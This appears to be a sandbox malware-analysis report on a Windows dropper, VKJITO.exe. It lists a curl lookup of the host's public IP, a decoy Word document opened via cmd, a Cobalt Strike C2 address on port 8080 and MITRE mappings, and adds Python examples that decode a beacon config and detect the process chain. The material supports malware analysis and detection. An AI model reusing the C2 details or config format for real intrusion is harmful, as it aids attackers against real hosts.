        Source: VKJITO.exeStatic PE information: Image base 0x140000000 > 0x60000000
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
        Source: VKJITO.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: VKJITO.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: Binary string: VKJITO.pdb source: VKJITO.exe
        Source: Binary string: VKJITO.pdbH source: VKJITO.exe
        Source: VKJITO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
        Source: VKJITO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
        Source: VKJITO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
        Source: VKJITO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
        Source: VKJITO.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4321880 SetLastError,GetCurrentDirectoryW,GetLastError,GetLastError,GetLastError,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlLookupFunctionEntry,WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,ReleaseMutex,RtlVirtualUnwind,memset,WideCharToMultiByte,0_2_00007FF7D4321880
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_000001A673A102FA push eax; ret 0_2_000001A673A10364
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_000001A673A10128 push eax; ret 0_2_000001A673A10364
        Source: C:\Users\user\Desktop\VKJITO.exeCode function: 0_2_00007FF7D4321880 SetLastError,GetCurrentDirectoryW,GetLastError,GetLastError,GetLastError,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlLookupFunctionEntry,WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,ReleaseMutex,RtlVirtualUnwind,memset,WideCharToMultiByte,0_2_00007FF7D4321880
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
        Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
        Source: Amcache.hve.9.dr Binary or memory string: VMware
        Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin
        Source: Amcache.hve.9.dr Binary or memory string: VMware, Inc.
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673B2E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWm
        Source: Amcache.hve.9.dr Binary or memory string: VMware20,1hbin@
        Source: Amcache.hve.9.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
        Source: Amcache.hve.9.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: Amcache.hve.9.dr Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673B2E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
        Source: Amcache.hve.9.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.9.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
        Source: Amcache.hve.9.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
        Source: Amcache.hve.9.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
        Source: curl.exe, 00000001.00000003.2054053753.0000022B7B264000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
        Source: Amcache.hve.9.dr Binary or memory string: vmci.sys
        Source: Amcache.hve.9.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
        Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin`
        Source: Amcache.hve.9.dr Binary or memory string: \driver\vmci,\driver\pci
        Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
        Source: Amcache.hve.9.dr Binary or memory string: VMware20,1
        Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
        Source: Amcache.hve.9.dr Binary or memory string: VMware PCI VMCI Bus Device
        Source: VKJITO.exe, 00000000.00000002.2451554357.000001A673AD6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW@K
        Source: Amcache.hve.9.dr Binary or memory string: VMware VMCI Bus Device
        Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual RAM
        Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.9.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE Process information queried: ProcessInformation
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF7D435A9C0 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7D435A9C0
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF7D4321880 SetLastError,GetCurrentDirectoryW,GetLastError,GetLastError,GetLastError,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlLookupFunctionEntry,WaitForSingleObjectEx,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetCurrentProcess,memset,GetProcAddress,GetCurrentProcess,lstrlenW,GetCurrentProcessId,CreateMutexA,CloseHandle,ReleaseMutex,GetProcAddress,GetCurrentProcess,GetProcAddress,GetCurrentProcess,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,ReleaseMutex,RtlVirtualUnwind,memset,WideCharToMultiByte,0_2_00007FF7D4321880
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF7D433E590 HeapAlloc,GetProcessHeap,HeapAlloc,0_2_00007FF7D433E590
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF7D435AB64 SetUnhandledExceptionFilter,0_2_00007FF7D435AB64
        Source: C:\Users\user\Desktop\VKJITO.exe Memory allocated: page read and write | page guard
        Source: C:\Users\user\Desktop\VKJITO.exe Process created: C:\Windows\System32\curl.exe "curl" ip.sb
        Source: C:\Users\user\Desktop\VKJITO.exe Process created: C:\Windows\System32\cmd.exe "cmd" /c start C:\Users\user\Desktop\???????.docx
        Source: C:\Windows\System32\cmd.exe Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF7D4342940 BCryptGenRandom,GetCurrentProcessId,BCryptGenRandom,CreateNamedPipeW,GetLastError,BCryptGenRandom,CloseHandle,BCryptGenRandom,0_2_00007FF7D4342940
        Source: C:\Users\user\Desktop\VKJITO.exe Code function: 0_2_00007FF7D435A89C GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF7D435A89C
        Source: Amcache.hve.9.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
        Source: Amcache.hve.9.dr Binary or memory string: msmpeng.exe
        Source: Amcache.hve.9.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
        Source: Amcache.hve.9.dr Binary or memory string: MsMpEng.exe

        Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2451518611.000001A673A10000.00000010.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2451554357.000001A673ABC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
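The report states that a malware configuration was extracted from memory and that the Yara rules for CobaltStrike and Metasploit matched the dumps above, but the page does not show the configuration itself. The following added example (not Joe Sandbox's code and not taken from the sample) shows how a Cobalt Strike beacon config is typically located and decoded from a memory region: the blob is XORed with a single byte (0x69 for 3.x builds, 0x2e for 4.x builds) and, once decoded, is a list of big-endian TLV records that always begins with field 1 (BeaconType). The memory region is constructed here; only the C2 IP 139.159.139.109 and port 8080 are taken from the report, and the URI, sleep time, jitter and user agent are assumptions.

```python
import struct
from typing import Dict, Optional, Tuple, Union

# Cobalt Strike stores its beacon config XOR-encoded with a single byte:
# 0x69 in 3.x builds and 0x2e in 4.x builds. Decoded, it is a list of
# big-endian TLV records: index (u16), type (u16), length (u16), value.
# Type 1 = 16-bit int, 2 = 32-bit int, 3 = raw bytes. Field 1 (BeaconType)
# is first, so every decoded config begins with 00 01 00 01 00 02, and
# that six-byte pattern XORed with each key is what scanners look for.
XOR_KEYS = (0x69, 0x2E)
CONFIG_MAGIC = bytes.fromhex("000100010002")
FIELD_NAMES = {1: "BeaconType", 2: "Port", 3: "SleepTime", 4: "MaxGetSize",
               5: "Jitter", 8: "C2Server", 9: "UserAgent", 10: "HttpPostUri"}
BEACON_TYPES = {0: "HTTP", 1: "Hybrid HTTP DNS", 2: "SMB", 4: "TCP",
                8: "HTTPS", 16: "Bind TCP"}

Value = Union[int, str]


def xor(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def tlv(index: int, ftype: int, value: bytes) -> bytes:
    return struct.pack(">HHH", index, ftype, len(value)) + value


def constructed_dump(key: int = 0x2E) -> bytes:
    """A fake memory region: filler bytes, then an encoded config zero-padded
    the way real beacons pad theirs, then more filler. Constructed for this
    example; only the C2 IP and port come from the report, the URI, sleep,
    jitter and user agent are assumptions."""
    config = b"".join([
        tlv(1, 1, struct.pack(">H", 0)),                            # BeaconType: HTTP
        tlv(2, 1, struct.pack(">H", 8080)),                         # Port
        tlv(3, 2, struct.pack(">I", 60000)),                        # SleepTime in ms
        tlv(5, 1, struct.pack(">H", 10)),                           # Jitter percent
        tlv(8, 3, b"139.159.139.109,/ga.js".ljust(256, b"\x00")),   # C2Server: host,uri
        tlv(9, 3, b"Mozilla/5.0 (Windows NT 10.0; Win64; x64)".ljust(128, b"\x00")),
        tlv(10, 3, b"/submit.php".ljust(64, b"\x00")),              # HttpPostUri
    ]).ljust(1024, b"\x00")                                         # index 0 ends the list
    return b"\x90" * 96 + b"\xcc" * 32 + xor(config, key) + b"\x90" * 64


def find_config(blob: bytes) -> Optional[Tuple[int, int]]:
    """Locate the encoded config header; returns (xor_key, offset) or None."""
    for key in XOR_KEYS:
        off = blob.find(xor(CONFIG_MAGIC, key))
        if off != -1:
            return key, off
    return None


def parse_config(blob: bytes, max_len: int = 4096) -> Optional[Dict[str, Value]]:
    """Decode the config at the located offset into a name -> value dict."""
    hit = find_config(blob)
    if hit is None:
        return None
    key, off = hit
    data = xor(blob[off:off + max_len], key)
    fields: Dict[str, Value] = {}
    pos = 0
    while pos + 6 <= len(data):
        idx, ftype, length = struct.unpack_from(">HHH", data, pos)
        pos += 6
        if idx == 0:                      # zero padding after the last field
            break
        raw = data[pos:pos + length]
        pos += length
        if len(raw) < length:             # truncated dump
            break
        value: Value
        if ftype == 1 and length == 2:
            value = struct.unpack(">H", raw)[0]
        elif ftype == 2 and length == 4:
            value = struct.unpack(">I", raw)[0]
        else:
            value = raw.split(b"\x00", 1)[0].decode("latin-1")
        if idx == 1 and isinstance(value, int):
            value = BEACON_TYPES.get(value, value)
        fields[FIELD_NAMES.get(idx, "field_%d" % idx)] = value
    return fields


if __name__ == "__main__":
    for name, val in (parse_config(constructed_dump()) or {}).items():
        print("%-12s %s" % (name, val))
```

Run against a real dump such as the PAGE_EXECUTE private region listed above, the same scan would be applied to the file bytes; the parser stops at the first zero index, which is how a zero-padded config signals its end, and it bails out instead of raising if the dump is truncated mid-record.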
MITRE ATT&CK Matrix (techniques are listed per tactic in the matrix's row order; a count in parentheses is the number of signatures mapped to that technique, and techniques without a count are the matrix's default entries with no match):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: Native API (1); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: Browser Extensions (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: Process Injection (12); DLL Side-Loading (1); Extra Window Memory Injection (1); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: Masquerading (2); Disable or Modify Tools (1); Process Injection (12); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (2); DLL Side-Loading (1); Extra Window Memory Injection (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: System Time Discovery (1); Security Software Discovery (31); Process Discovery (1); File and Directory Discovery (1); System Information Discovery (3); Wi-Fi Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: Archive Collected Data (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: Encrypted Channel (2); Non-Standard Port (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (2); Application Layer Protocol (112); Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
Behavior Graph (ID: 1577651; Sample: VKJITO.exe; Start date: 18/12/2024; Architecture: WINDOWS; Score: 92), reconstructed from the graph text. Numbers in parentheses after a process are the node counts shown in the graph (see the legend above); network entries are given as IP, local port, remote port, AS name, country.

Signatures on the root node: Found malware configuration; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures
DNS names resolved: templatesmetadata.office.net; ip.sb

VKJITO.exe (7) started
    network: 139.159.139.109, 49707, 8080, HWCSNETHuaweiCloudServicedatacenterCN, China
    WerFault.exe (19, 16) started
        dropped: C:\ProgramData\Microsoft\...\Report.wer (Unicode)
    curl.exe (1) started
        network: ip.sb 104.26.12.31, 49706, 80, CLOUDFLARENETUS, United States
        network: 127.0.0.1, unknown, unknown
        conhost.exe started
    cmd.exe (4, 2) started
        WINWORD.EXE (190, 462) started
        conhost.exe started
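The process tree in this graph and in the "Process created" entries above is the classic shape of a document-themed dropper: an executable on the user's Desktop asks curl.exe for the host's public IP (ip.sb), opens a decoy .docx through cmd.exe /c start so the victim sees Word, and itself talks to 139.159.139.109 on port 8080, which is what the "Communication To Uncommon Destination Ports" Sigma hit refers to. The added example below (written for this page, not Joe Sandbox's code and not a Sigma rule from the report) runs three such checks over constructed Sysmon-style process-creation and network-connection events and correlates them per parent process. The PIDs 3056, 4068 and 3008 and the command lines are from the report; the PIDs for cmd.exe and WINWORD.EXE, the benign explorer.exe events, the common-port list and the user-writable path list are assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Set, Tuple

# Paths a standard user can write to; an executable living here that
# orchestrates other processes deserves more scrutiny than one in System32.
USER_WRITABLE = re.compile(
    r"^c:\\(users\\[^\\]+\\(desktop|downloads|appdata)|programdata|windows\\temp)\\", re.I)
IP_LOOKUP_HOSTS = {"ip.sb", "ifconfig.me", "api.ipify.org", "icanhazip.com", "ipinfo.io"}
DOWNLOADERS = {"curl.exe", "certutil.exe", "bitsadmin.exe", "powershell.exe", "wget.exe"}
DECOY_EXT = (".docx", ".doc", ".pdf", ".xlsx", ".txt")
# Ports the "uncommon destination port" check treats as ordinary
# (assumed list; tune it to the environment).
COMMON_PORTS = {25, 53, 80, 123, 135, 139, 443, 445, 587, 993, 3389, 5985, 8443}


@dataclass
class ProcEvent:          # subset of a Sysmon Event ID 1 record
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class NetEvent:           # subset of a Sysmon Event ID 3 record
    pid: int
    image: str
    dst_ip: str
    dst_port: int


# Constructed events mirroring the report's process tree and behavior graph.
# PIDs 3056/4068/3008 are from the report; the cmd.exe, WINWORD.EXE and the
# benign explorer.exe entries (their PIDs and the 192.0.2.10 peer) are made up.
# The sandbox rendered the decoy's non-ASCII file name as question marks.
PROC_EVENTS = [
    ProcEvent(3056, 1234, r"C:\Users\user\Desktop\VKJITO.exe", r'"C:\Users\user\Desktop\VKJITO.exe"'),
    ProcEvent(4068, 3056, r"C:\Windows\System32\curl.exe", '"curl" ip.sb'),
    ProcEvent(3008, 4068, r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    ProcEvent(5120, 3056, r"C:\Windows\System32\cmd.exe", r'"cmd" /c start C:\Users\user\Desktop\???????.docx'),
    ProcEvent(5304, 5120, r"C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\???????.docx" /o ""'),
    ProcEvent(6000, 1234, r"C:\Windows\explorer.exe", "explorer.exe"),
]
NET_EVENTS = [
    NetEvent(3056, r"C:\Users\user\Desktop\VKJITO.exe", "139.159.139.109", 8080),
    NetEvent(4068, r"C:\Windows\System32\curl.exe", "104.26.12.31", 80),
    NetEvent(6000, r"C:\Windows\explorer.exe", "192.0.2.10", 443),
]

Finding = Tuple[str, int, str]   # (rule, pid of the suspicious process, evidence)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def detect(procs: List[ProcEvent], nets: List[NetEvent]) -> List[Finding]:
    by_pid = {p.pid: p for p in procs}
    findings: List[Finding] = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        if parent is None or not USER_WRITABLE.match(parent.image):
            continue
        child, cl = basename(p.image), p.cmdline.lower()
        # Rule 1: a LOLBin asked a public-IP service where the host is.
        if child in DOWNLOADERS and any(h in cl for h in IP_LOOKUP_HOSTS):
            findings.append(("public_ip_lookup_from_user_path", parent.pid, p.cmdline))
        # Rule 2: cmd /c start <document>: a dropper showing a decoy document.
        if child == "cmd.exe" and "/c start" in cl and cl.rstrip('"').endswith(DECOY_EXT):
            findings.append(("decoy_document_opened", parent.pid, p.cmdline))
    for n in nets:
        # Rule 3: a user-path binary talking to a port outside the common set.
        if USER_WRITABLE.match(n.image) and n.dst_port not in COMMON_PORTS:
            findings.append(("uncommon_destination_port", n.pid, "%s:%d" % (n.dst_ip, n.dst_port)))
    return findings


def correlate(findings: List[Finding]) -> Dict[int, Set[str]]:
    """Group rule hits by the process they implicate."""
    per_pid: Dict[int, Set[str]] = {}
    for rule, pid, _ in findings:
        per_pid.setdefault(pid, set()).add(rule)
    return per_pid


def verdict(per_pid: Dict[int, Set[str]], pid: int) -> str:
    rules = per_pid.get(pid, set())
    if {"public_ip_lookup_from_user_path", "decoy_document_opened",
        "uncommon_destination_port"} <= rules:
        return "high"        # the full chain seen from one process
    if len(rules) >= 2:
        return "medium"
    return "low" if rules else "none"


if __name__ == "__main__":
    per = correlate(detect(PROC_EVENTS, NET_EVENTS))
    for pid, rules in per.items():
        print(pid, verdict(per, pid), sorted(rules))
```

Each rule on its own is noisy (developers run curl, users open documents), which is why the findings are keyed on the parent process rather than the child: only the Desktop executable that did all three things reaches "high", while curl.exe, cmd.exe and WINWORD.EXE produce no findings of their own.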

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.